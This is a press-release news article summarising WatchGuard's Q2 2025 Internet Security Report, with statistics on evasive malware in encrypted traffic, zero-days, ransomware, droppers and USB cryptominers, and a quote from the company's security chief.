ICT platform for business computer users

WatchGuard: 40% more evasive malware via encrypted connections 
Press Releases
Security
watchguard-40-meer-evasieve-malware-via-versleutelde-verbindingen
Published by
noah.clipboardmedia_11171
Wed, 28 January 2026, 07:29
Share

According to WatchGuard's Internet Security Report, evasive malware is growing by 40% and is massively hiding in TLS traffic. Zero-days dominate, while ransomware becomes more targeted. Discover here why visibility into encryption is crucial

Cybercriminals embrace stealth tactics and zero-day malware

The total number of malware detections increased by 15% compared to Q1. The largest growth came from Gateway AntiVirus (+85%) and IntelligentAV (+10%). Currently, 70% of all malware attacks occur via encrypted traffic, a record share that shows how important visibility in TLS traffic is for effective security.

Notable trends

The report from the WatchGuard Threat Lab provides an overview of the most notable trends in malware, network, and endpoint threats in the second quarter of 2025. The main findings from the Q2 2025 Internet Security Report:
 

  • Evasive malware +40%, encryption as a cover

Attackers are increasingly using encryption to evade detection. The number of unique malware variants increased by 26%, partly due to the use of polymorphic and encrypted packers that bypass signature-based detection.
 

  • Zero-days dominate

76% of all malware is now zero-day – and for malware over TLS, that rises to nearly 90%. This shows that classic detection methods are becoming less effective.
 

  • Ransomware drops 47%, but becomes more targeted

The number of ransomware campaigns is decreasing, but the attacks that do occur are more sophisticated and target high-impact organizations. Extortion groups like Akira and Qilin are among the most active.
 

  • Droppers dominate network malware

Seven of the ten most detected payloads were droppers, including Trojan.VBA.Agent.BIZ and PonyStealer, which are activated via macros in documents. The notorious Mirai botnet family also made a comeback, particularly in the APAC region.
 

  • USB malware makes a return

The Threat Lab discovered two new USB-borne variants (PUMPBENCH and HIGHREPS) that install cryptominers. Both use XMRig to mine Monero.
 

  • Network attacks increase by 8.3%

The number of network layer attacks increased slightly by 8.3%, but diversity decreased: 380 unique signatures compared to 412 in the previous quarter. A notable newcomer was WEB-CLIENT JavaScript Obfuscation in Exploit Kits, an example of how quickly new exploit techniques emerge.
 

  • DNS threats persist

Domains linked to the DarkGate RAT-loader remained active. This proves the importance of DNS filtering as the first line of defense.
 

  • Attackers hide in plain sight

"We see a strong increase in evasive malware over encrypted channels in Q2," said Corey Nachreiner, Chief Security Officer at WatchGuard. "Attackers are increasingly using stealth tactics to evade detection. For MSPs and IT teams with limited resources, speed, visibility, and integrated protection are essential to effectively combat these threats."

digitale-weerbaarheid-tekort-aan-monitoring-oefendiscipline-en-ketenbeveiliging-remt-volwassenheid
Security
Background

Digital resilience: lack of monitoring, exercise discipline, and supply chain security hinders maturity

Saturday 24 January 2026 - 13:35
toekomstbestendige-beveiliging-van-hype-naar-harde-noodzaak
Security

Future-proof security: from hype to hard necessity

Friday 23 January 2026 - 17:50
ethical-hacking-verlengstuk-van-cybersecurity
Security
Practice

Ethical hacking: extension of cybersecurity

Thursday 22 January 2026 - 08:35
dell-technologies-lanceert-powerstore-43-meer-opslag-slimme-data-inzichten-en-betere
Security
Storage

Dell Technologies launches PowerStore 4.3: more storage, smart data insights, and better cybersecurity

Wednesday 21 January 2026 - 08:35